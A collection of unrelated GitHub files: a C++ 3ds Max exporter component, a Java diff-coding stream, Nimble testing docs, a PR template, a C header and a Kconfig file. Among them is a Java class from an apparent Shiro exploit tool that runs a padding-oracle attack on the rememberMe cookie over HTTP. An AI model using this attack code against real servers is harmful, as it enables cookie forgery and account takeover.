plComponent::kBlkComp, _T("clickable"), 0, &gClickableDesc, P_AUTO_CONSTRUCT + P_AUTO_UI, plComponent::kRefComp,
IDD_COMP_DETECTOR_CLICKABLE, IDS_COMP_DETECTOR_CLICKABLE, 0, 0, NULL,
kClickableDirectional, _T("directional"), TYPE_BOOL, 0, 0,
p_ui, TYPE_SINGLECHEKBOX, IDC_COMP_CLICK_OMNI,
end,
kClickableDegrees, _T("degrees"), TYPE_INT, P_ANIMATABLE, 0,
p_range, 1, 180,
p_default, 180,
p_ui, TYPE_SPINNER, EDITTYPE_POS_INT,
IDC_COMP_CLICK_DEG, IDC_COMP_CLICK_DEGSPIN, SPIN_AUTOSCALE,
end,
kClickableUseProxy, _T("useProxy"), TYPE_BOOL, 0, 0,
p_ui, TYPE_SINGLECHEKBOX, IDC_COMP_CLICK_USEPROXY,
p_enable_ctrls, 1, kClickableProxy,
end,
kClickableProxy, _T("proxyPrimitave"), TYPE_INODE, 0, 0,
p_ui, TYPE_PICKNODEBUTTON, IDC_COMP_CLICK_PROXY,
// p_sclassID, GEOMOBJECT_CLASS_ID,
p_prompt, IDS_COMP_PHYS_CHOSEN_BASE,
end,
kClickableProxyRegion, _T("proxyRegion"), TYPE_INODE, 0, 0,
p_ui, TYPE_PICKNODEBUTTON, IDC_COMP_CLICK_PROXYREGION,
// p_sclassID, GEOMOBJECT_CLASS_ID,
p_prompt, IDS_COMP_PHYS_CHOSEN_BASE,
end,
kClickableOneShot, _T("oneshot"), TYPE_BOOL, 0, 0,
p_ui, TYPE_SINGLECHEKBOX, IDC_ONESHOT,
end,
kClickableBoundsType, _T("BoundingConditions"), TYPE_INT, 0, 0,
p_ui, TYPE_RADIO, 4, IDC_RADIO_BSPHERE, IDC_RADIO_BBOX, IDC_RADIO_BHULL, IDC_RADIO_PICKSTATE,
p_vals, plSimDefs::kSphereBounds, plSimDefs::kBoxBounds, plSimDefs::kHullBounds, plSimDefs::kProxyBounds,
p_default, plSimDefs::kHullBounds,
end,
kClickableEnabled, _T("enabled"), TYPE_BOOL, 0, 0,
p_ui, TYPE_SINGLECHEKBOX, IDC_ENABLED,
p_default, TRUE,
end,
kClickablePhysical, _T("physical"), TYPE_BOOL, 0, 0,
p_ui, TYPE_SINGLECHEKBOX, IDC_COLLIDABLE_CHECK,
p_default, TRUE,
end,
kClickableIgnoreProxyRegion, _T("ignoreProxyRegion"), TYPE_BOOL, 0, 0,
p_ui, TYPE_SINGLECHEKBOX, IDC_IGNORE_REGION_CHECK,
p_default, FALSE,
end,
kClickableFriction, _T("friction"), TYPE_FLOAT, 0, 0,
p_range, 0.0f, FLT_MAX,
p_default, 0.0f,
p_ui, TYPE_SPINNER, EDITTYPE_POS_FLOAT,
IDC_COMP_CLICKABLE_FRIC_EDIT1, IDC_COMP_CLICKABLE_FRIC_SPIN1, SPIN_AUTOSCALE,
end,
end
);
plClickableComponent::plClickableComponent()
{
fClassDesc = &gClickableDesc;
fClassDesc->MakeAutoParamBlocks(this);
}
void plClickableComponent::CollectNonDrawables(INodeTab& nonDrawables)
{
if( fCompPB->GetInt(kClickableUseProxy) )
{
INode* clickNode = fCompPB->GetINode(kClickableProxy);
if( clickNode )
nonDrawables.Append(1, &clickNode);
}
INode* detectNode = fCompPB->GetINode(kClickableProxyRegion);
if( detectNode )
nonDrawables.Append(1, &detectNode);
}
bool plClickableComponent::SetupProperties(plMaxNode* node, plErrorMsg* pErrMsg)
{
plActivatorBaseComponent::SetupProperties(node, pErrMsg);
bool physical = (fCompPB->GetInt(kClickablePhysical) != 0);
//
// Phys Props for the Clickable itself.
//
plMaxNode *clickNode = node;
if (fCompPB->GetInt(kClickableUseProxy))
{
clickNode = (plMaxNode*)fCompPB->GetINode(kClickableProxy);
if (clickNode)
clickNode->SetDrawable(false);
else
clickNode = node;
}
if (clickNode)
{
plPhysicalProps *physProps = clickNode->GetPhysicalProps();
physProps->SetLOSUIItem(true, clickNode, pErrMsg);
if (physical)
{
physProps->SetGroup(plSimDefs::kGroupStatic, clickNode, pErrMsg);
// only if movable will it have mass (then it will keep track of movements in PhysX)
if ( clickNode->IsMovable() || clickNode->IsTMAnimatedRecur() )
physProps->SetMass(1.0, clickNode, pErrMsg);
physProps->SetFriction(fCompPB->GetFloat(kClickableFriction),clickNode,pErrMsg);
}
else
{
physProps->SetGroup(plSimDefs::kGroupLOSOnly, clickNode, pErrMsg);
if(clickNode->IsMovable() || clickNode->IsTMAnimatedRecur())
{
physProps->SetMass(1.0, clickNode, pErrMsg);
}
}
physProps->SetBoundsType(fCompPB->GetInt(kClickableBoundsType), clickNode, pErrMsg);
}
//
// Phys Properties for the auto-generated Detector Region...
//
plMaxNode* detectNode = (plMaxNode*)fCompPB->GetINode(kClickableProxyRegion);
if (detectNode)
{
plPhysicalProps *physPropsDetector = detectNode->GetPhysicalProps();
// physPropsDetector->SetAllowLOS(true, detectNode, pErrMsg);
physPropsDetector->SetProxyNode(detectNode, node, pErrMsg);
physPropsDetector->SetBoundsType(plSimDefs::kHullBounds, detectNode, pErrMsg);
// only if movable will it have mass (then it will keep track of movements in PhysX)
if ( detectNode->IsMovable() || detectNode->IsTMAnimatedRecur() )
physPropsDetector->SetMass(1.0, detectNode, pErrMsg);
physPropsDetector->SetGroup(plSimDefs::kGroupDetector, detectNode, pErrMsg );
physPropsDetector->SetReportGroup(1<<plSimDefs::kGroupAvatar, detectNode, pErrMsg );
}
return true;
}
bool plClickableComponent::PreConvert(plMaxNode *node, plErrorMsg *pErrMsg)
{
plMaxNode *clickNode = node;
if (fCompPB->GetInt(kClickableUseProxy))
{
clickNode = (plMaxNode*)fCompPB->GetINode(kClickableProxy);
if (clickNode)
clickNode->SetDrawable(false);
else
clickNode = node;
}
clickNode->SetForceLocal(true);
plLocation loc = clickNode->GetLocation();
plSceneObject *obj = clickNode->GetSceneObject();
// Create and register the VolumeGadget's logic component
plLogicModifier *logic = new plLogicModifier;
plKey logicKey = hsgResMgr::ResMgr()->NewKey(IGetUniqueName(node), logic, clickNode->GetLocation());
hsgResMgr::ResMgr()->AddViaNotify(logicKey, new plObjRefMsg(obj->GetKey(), plRefMsg::kOnCreate, -1, plObjRefMsg::kModifier), plRefFlags::kActiveRef);
fLogicModKeys[clickNode] = logicKey;
return true;
}
bool plClickableComponent::Convert(plMaxNode *node, plErrorMsg *pErrMsg)
{
bool ignoreProxyRegion = (fCompPB->GetInt(kClickableIgnoreProxyRegion) != 0);
//
// Error checking
//
plMaxNode* clickProxyNode = node;
if (fCompPB->GetInt(kClickableUseProxy))
{
clickProxyNode = (plMaxNode*)fCompPB->GetINode(kClickableProxy);
if (!clickProxyNode || !clickProxyNode->CanConvert())
{
pErrMsg->Set(true,
"Clickable Error",
"The Clickable '%s' on node '%s' is set to use a proxy but doesn't have one, or it didn't convert.\n"
"The node the Clickable is attached to will be used instead.",
GetINode()->GetName(), node->GetName()).Show();
pErrMsg->Set(false);
clickProxyNode = node;
}
}
plMaxNode* detectNode = (plMaxNode*)fCompPB->GetINode(kClickableProxyRegion);
if ((!detectNode || !detectNode->CanConvert()) && (!ignoreProxyRegion))
{
pErrMsg->Set(true,
"Clickable Error",
"The Clickable '%s' on node '%s' has a required region that is missing, or didn't convert.\n"
"The export will be aborted.",
GetINode()->GetName(), node->GetName()).Show();
return false;
}
plLocation loc = clickProxyNode->GetLocation();
plSceneObject *obj = clickProxyNode->GetSceneObject();
plKey logicKey = fLogicModKeys[clickProxyNode];
plLogicModifier *logic = plLogicModifier::ConvertNoRef(logicKey->GetObjectPtr());
logic->fMyCursor = plCursorChangeMsg::kCursorPoised;
if (fCompPB->GetInt(kClickableOneShot))
logic->SetFlag(plLogicModBase::kOneShot);
hsTArray<plKey> receivers;
IGetReceivers(node, receivers);
for (int i = 0; i < receivers.Count(); i++)
logic->AddNotifyReceiver(receivers[i]);
// Create the detector
plDetectorModifier *detector = nil;
detector = new plPickingDetector;
// Register the detector
plKey detectorKey = hsgResMgr::ResMgr()->NewKey(IGetUniqueName(node), detector, loc);
hsgResMgr::ResMgr()->AddViaNotify(detectorKey, new plObjRefMsg(obj->GetKey(), plRefMsg::kOnCreate, -1, plObjRefMsg::kModifier), plRefFlags::kActiveRef);
// create and register the CONDITIONS for the DETECTOR's Logic Modifier
plActivatorConditionalObject* activatorCond = new plActivatorConditionalObject;
plKey activatorKey = hsgResMgr::ResMgr()->NewKey(IGetUniqueName(node), activatorCond, loc);
//
// Create required region
//
// need a player in box condition here...
// first a detector-any for the box
if (!ignoreProxyRegion)
{
plObjectInVolumeDetector* pCDet = new plObjectInVolumeDetector(plCollisionDetector::kTypeAny);
plKey pCDetKey = hsgResMgr::ResMgr()->NewKey(IGetUniqueName(node), pCDet, loc);
hsgResMgr::ResMgr()->AddViaNotify(pCDetKey, new plObjRefMsg(detectNode->GetSceneObject()->GetKey(), plRefMsg::kOnCreate, -1, plObjRefMsg::kModifier), plRefFlags::kActiveRef);
pCDet->AddLogicObj(logicKey);
// then an object-in-box condition for the logic mod
plObjectInBoxConditionalObject* boxCond = new plObjectInBoxConditionalObject;
plKey boxCondKey = hsgResMgr::ResMgr()->NewKey(IGetUniqueName(node), boxCond, loc);
logic->AddCondition(boxCond);
}
//
// How do we feel about player facing
//
plFacingConditionalObject* facingCond = new plFacingConditionalObject;
facingCond->SetDirectional(fCompPB->GetInt(kClickableDirectional));
int deg = fCompPB->GetInt(kClickableDegrees);
if (deg > 180)
deg = 180;
float rad = hsDegreesToRadians(deg);
facingCond->SetTolerance(cos(rad));
plKey facingKey = hsgResMgr::ResMgr()->NewKey(IGetUniqueName(node), facingCond, loc);
detector->AddLogicObj(logicKey); // send messages to this logic component
activatorCond->SetActivatorKey(detectorKey); // Tells the activator condition to look for stimulus from the detector
logic->AddCondition(activatorCond); // add this activator condition
logic->AddCondition(facingCond);
logic->SetDisabled(!fCompPB->GetInt(kClickableEnabled));
// If this is for the SceneViewer, set the local only flag since the read function will never be called
if (plConvert::Instance().IsForSceneViewer())
logic->SetLocalOnly(true);
return true;
}
//
// special physical you can walk through and click with mouse
//
class plNoBlkClickableComponent : public plComponent
{
public:
plNoBlkClickableComponent();
void DeleteThis() { delete this; }
bool SetupProperties(plMaxNode *node, plErrorMsg *pErrMsg);
bool Convert(plMaxNode *node, plErrorMsg *pErrMsg) { return true; }
bool PreConvert(plMaxNode *node, plErrorMsg *pErrMsg) { return true; }
virtual void CollectNonDrawables(INodeTab& nonDrawables) { AddTargetsToList(nonDrawables); }
};
OBSOLETE_CLASS_DESC(plNoBlkClickableComponent, gNoBlkClickableDesc, "(ex)Non Physical Clickable Proxy", "(ex)Non Physical Clickable Proxy", COMP_TYPE_PHYSICAL, Class_ID(0x66325afc, 0x253a3760))
ParamBlockDesc2 gNoBlkClickableBlock
(
plComponent::kBlkComp, _T("NonPhysicalClickableProxy"), 0, &gNoBlkClickableDesc, P_AUTO_CONSTRUCT, plComponent::kRefComp,
end
);
plNoBlkClickableComponent::plNoBlkClickableComponent()
{
fClassDesc = &gNoBlkClickableDesc;
fClassDesc->MakeAutoParamBlocks(this);
}
bool plNoBlkClickableComponent::SetupProperties(plMaxNode *pNode, plErrorMsg *pErrMsg)
{
return true;
}
| {
"pile_set_name": "Github"
} |
package com.shiroexploit.core;
import com.shiroexploit.util.HttpRequest;
import com.shiroexploit.util.HttpRequestInfo;
import com.shiroexploit.util.Tools;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.atomic.AtomicInteger;
public class RoundTask {
private int threads;
private String cipherText;
private int position;
private String rememberMe;
private StringBuffer intermediary;
private String suffix;
private HttpRequestInfo httpRequestInfo;
public RoundTask(HttpRequestInfo httpRequestInfo, int position, String cipherText, StringBuffer intermediary) {
this.threads = 1;
this.httpRequestInfo = httpRequestInfo;
this.cipherText = cipherText;
this.position = position;
this.rememberMe = httpRequestInfo.getRememberMeCookie();
this.intermediary = intermediary;
this.suffix = Tools.xor(intermediary.toString(), Tools.generateSuffix(position));
}
private AtomicInteger _index = new AtomicInteger(0);
public void start() {
final CountDownLatch latch = new CountDownLatch(256);
final ExecutorService executor = Executors.newFixedThreadPool(this.threads);
for(int a = 0; a < 256; a++) {
if(!executor.isShutdown()){
executor.execute(new Runnable() {
@Override
public void run() {
int j = _index.getAndIncrement();
String hex = Integer.toHexString(j);
if (hex.length() == 1) {
hex = 0 + hex;
}
String ivString = "00000000000000000000000000000000".substring(2 * position) + hex + suffix;
String paddingOraclePayload = Tools.generatePayload(rememberMe, ivString, cipherText);
if (HttpRequest.isValid(httpRequestInfo, paddingOraclePayload)) {
// position=1 的时候有非常低的概率可能是满足 0x02 0x02 类似形式的padding,需要排除这种可能
if (position == 1) {
ivString = ivString.substring(0, 28) + "01" + ivString.substring(30);
paddingOraclePayload = Tools.generatePayload(rememberMe, ivString, cipherText);
if (HttpRequest.isValid(httpRequestInfo, paddingOraclePayload)) {
synchronized (RoundTask.class){
intermediary.insert(0, Tools.xor(Integer.toHexString(position), ivString));
executor.shutdownNow();
while (latch.getCount() > 0) {
latch.countDown();
}
}
}
} else {
synchronized (RoundTask.class){
intermediary.insert(0, Tools.xor(Integer.toHexString(position), ivString.substring(32 - 2 * position, 32 - 2 * position + 2)));
executor.shutdownNow();
while (latch.getCount() > 0) {
latch.countDown();
}
}
}
}
latch.countDown();
}
});
}
}
try {
latch.await();
} catch (InterruptedException e) {
e.printStackTrace();
}
}
}
| {
"pile_set_name": "Github"
} |
/**
* DataOutputStream extended by varlength diff coding
*
* @author ab
*/
package btools.util;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.OutputStream;
public final class DiffCoderDataOutputStream extends DataOutputStream
{
private long[] lastValues = new long[10];
public DiffCoderDataOutputStream( OutputStream os )
{
super( os );
}
public void writeDiffed( long v, int idx ) throws IOException
{
long d = v - lastValues[idx];
lastValues[idx] = v;
writeSigned( d );
}
public void writeSigned( long v ) throws IOException
{
writeUnsigned( v < 0 ? ( (-v) << 1 ) | 1 : v << 1 );
}
public void writeUnsigned( long v ) throws IOException
{
do
{
long i7 = v & 0x7f;
v >>= 7;
if ( v != 0 ) i7 |= 0x80;
writeByte( (byte)( i7 & 0xff ) );
}
while( v != 0 );
}
}
| {
"pile_set_name": "Github"
} |
# Clearer Tests Using Nimble Assertions
When code doesn't work the way its supposed to, unit tests should make it
**clear** exactly what's wrong.
Take the following function, which given a bunch of monkeys, only returns
the silly monkeys in the bunch:
```swift
public func silliest(monkeys: [Monkey]) -> [Monkey] {
return monkeys.filter { $0.silliness == .VerySilly }
}
```
Now let's say we have a unit test for this function:
```swift
func testSilliest_whenMonkeysContainSillyMonkeys_theyreIncludedInTheResult() {
let kiki = Monkey(name: "Kiki", silliness: .ExtremelySilly)
let carl = Monkey(name: "Carl", silliness: .NotSilly)
let jane = Monkey(name: "Jane", silliness: .VerySilly)
let sillyMonkeys = silliest([kiki, carl, jane])
XCTAssertTrue(contains(sillyMonkeys, kiki))
}
```
The test fails with the following failure message:
```
XCTAssertTrue failed
```

The failure message leaves a lot to be desired. It leaves us wondering,
"OK, so something that should have been true was false--but what?"
That confusion slows us down, since we now have to spend time deciphering test code.
## Better Failure Messages, Part 1: Manually Providing `XCTAssert` Failure Messages
`XCTAssert` assertions allow us to specify a failure message of our own, which certainly helps:
```diff
func testSilliest_whenMonkeysContainSillyMonkeys_theyreIncludedInTheResult() {
let kiki = Monkey(name: "Kiki", silliness: .ExtremelySilly)
let carl = Monkey(name: "Carl", silliness: .NotSilly)
let jane = Monkey(name: "Jane", silliness: .VerySilly)
let sillyMonkeys = silliest([kiki, carl, jane])
- XCTAssertTrue(contains(sillyMonkeys, kiki))
+ XCTAssertTrue(contains(sillyMonkeys, kiki), "Expected sillyMonkeys to contain 'Kiki'")
}
```
But we have to write our own failure message.
## Better Failure Messages, Part 2: Nimble Failure Messages
Nimble makes your test assertions, and their failure messages, easier to read:
```diff
func testSilliest_whenMonkeysContainSillyMonkeys_theyreIncludedInTheResult() {
let kiki = Monkey(name: "Kiki", silliness: .ExtremelySilly)
let carl = Monkey(name: "Carl", silliness: .NotSilly)
let jane = Monkey(name: "Jane", silliness: .VerySilly)
let sillyMonkeys = silliest([kiki, carl, jane])
- XCTAssertTrue(contains(sillyMonkeys, kiki), "Expected sillyMonkeys to contain 'Kiki'")
+ expect(sillyMonkeys).to(contain(kiki))
}
```
We don't have to write our own failure message--the one provided by Nimble
is already very readable:
```
expected to contain <Monkey(name: Kiki, sillines: ExtremelySilly)>,
got <[Monkey(name: Jane, silliness: VerySilly)]>
```

The failure message makes it clear what's wrong: we were expecting `kiki` to be included
in the result of `silliest()`, but the result only contains `jane`. Now that we know
exactly what's wrong, it's easy to fix the issue:
```diff
public func silliest(monkeys: [Monkey]) -> [Monkey] {
- return monkeys.filter { $0.silliness == .VerySilly }
+ return monkeys.filter { $0.silliness == .VerySilly || $0.silliness == .ExtremelySilly }
}
```
Nimble provides many different kind of assertions, each with great failure
messages. And unlike `XCTAssert`, you don't have to type your own failure message
every time.
For the full list of Nimble assertions, check out the [Nimble README](https://github.com/Quick/Nimble).
Below is just a sample, to whet your appetite:
```swift
expect(1 + 1).to(equal(2))
expect(1.2).to(beCloseTo(1.1, within: 0.1))
expect(3) > 2
expect("seahorse").to(contain("sea"))
expect(["Atlantic", "Pacific"]).toNot(contain("Mississippi"))
expect(ocean.isClean).toEventually(beTruthy())
```
| {
"pile_set_name": "Github"
} |
## Proposed changes
Please describe your changes in full here, including steps needed to build/test it. The more useful detail you give, the easier it is for the core team to review and approve :smile:
If this is a particularly large change, give as much detail as you can about the reasoning behind your solution, and any alternatives you considered.
**Please also include a link to the issue that this addresses (we usually won't accept pull requests without an associated issue).**
## Checklist
Below is a checklist of the key things that the core team will be looking for when reviewing your PR. Please check off as many of these as you can prior to submitting the PR, but don't worry if you can't do all of them, the core team are here to help!
- [ ] I have read the [CONTRIBUTING](https://github.com/adaptlearning/adapt_authoring/blob/master/.github/CONTRIBUTING.md) doc
- [ ] I have checked that the code compiles correctly
- [ ] I have checked that unit test suite passes locally with my changes
- [ ] I have added new tests that cover my changes (where appropriate)
- [ ] I have added documentation (where appropriate)
- [ ] Any dependent changes have already been merged
## Next steps
The core team will be automatically notified of your changes, but also feel free to bring it to our attention via the [gitter.im channel](https://gitter.im/adaptlearning/adapt_authoring).
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
#pragma once
#include <plasma/client.h>
#include <plasma-glib/client.h>
GPlasmaClient *
gplasma_client_new_raw(plasma::PlasmaClient *plasma_client);
plasma::PlasmaClient *
gplasma_client_get_raw(GPlasmaClient *client);
| {
"pile_set_name": "Github"
} |
config B43LEGACY
tristate "Broadcom 43xx-legacy wireless support (mac80211 stack)"
depends on SSB_POSSIBLE && MAC80211 && HAS_DMA
select SSB
select FW_LOADER
---help---
b43legacy is a driver for 802.11b devices from Broadcom (BCM4301 and
BCM4303) and early model 802.11g chips (BCM4306 Ver. 2) used in the
Linksys WPC54G V1 PCMCIA devices.
Newer 802.11g and 802.11a devices need b43.
It is safe to include both b43 and b43legacy as the underlying glue
layer will automatically load the correct version for your device.
This driver uses V3 firmware, which must be installed separately using
b43-fwcutter.
This driver can be built as a module (recommended) that will be
called "b43legacy". If unsure, say M.
# Auto-select SSB PCI-HOST support, if possible
config B43LEGACY_PCI_AUTOSELECT
bool
depends on B43LEGACY && SSB_PCIHOST_POSSIBLE
select SSB_PCIHOST
select SSB_B43_PCI_BRIDGE
default y
# Auto-select SSB PCICORE driver, if possible
config B43LEGACY_PCICORE_AUTOSELECT
bool
depends on B43LEGACY && SSB_DRIVER_PCICORE_POSSIBLE
select SSB_DRIVER_PCICORE
default y
# LED support
# This config option automatically enables b43legacy LEDS support,
# if it's possible.
config B43LEGACY_LEDS
bool
depends on B43LEGACY && MAC80211_LEDS && (LEDS_CLASS = y || LEDS_CLASS = B43LEGACY)
default y
# This config option automatically enables b43 HW-RNG support,
# if the HW-RNG core is enabled.
config B43LEGACY_HWRNG
bool
depends on B43LEGACY && (HW_RANDOM = y || HW_RANDOM = B43LEGACY)
default y
config B43LEGACY_DEBUG
bool "Broadcom 43xx-legacy debugging"
depends on B43LEGACY
default y
---help---
Say Y, because this information will help you get the driver running.
This option generates a minimum of log output.
config B43LEGACY_DMA
bool
depends on B43LEGACY
config B43LEGACY_PIO
bool
depends on B43LEGACY
choice
prompt "Broadcom 43xx-legacy data transfer mode"
depends on B43LEGACY
default B43LEGACY_DMA_AND_PIO_MODE
config B43LEGACY_DMA_AND_PIO_MODE
bool "DMA + PIO"
select B43LEGACY_DMA
select B43LEGACY_PIO
---help---
Include both, Direct Memory Access (DMA) and Programmed I/O (PIO)
data transfer modes. The mode actually used is selectable through
the module parameter "pio". With pio=0 as a module parameter, the
default DMA is used, otherwise PIO is used.
If unsure, choose this option.
config B43LEGACY_DMA_MODE
bool "DMA (Direct Memory Access) only"
select B43LEGACY_DMA
---help---
Only include Direct Memory Access (DMA).
This reduces the size of the driver module, by omitting the PIO code.
config B43LEGACY_PIO_MODE
bool "PIO (Programmed I/O) only"
select B43LEGACY_PIO
---help---
Only include Programmed I/O (PIO).
This reduces the size of the driver module, by omitting the DMA code.
Please note that PIO transfers are slow (compared to DMA).
Also note that not all devices of the b43legacy series support PIO.
You should use PIO only if DMA does not work for you.
endchoice
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.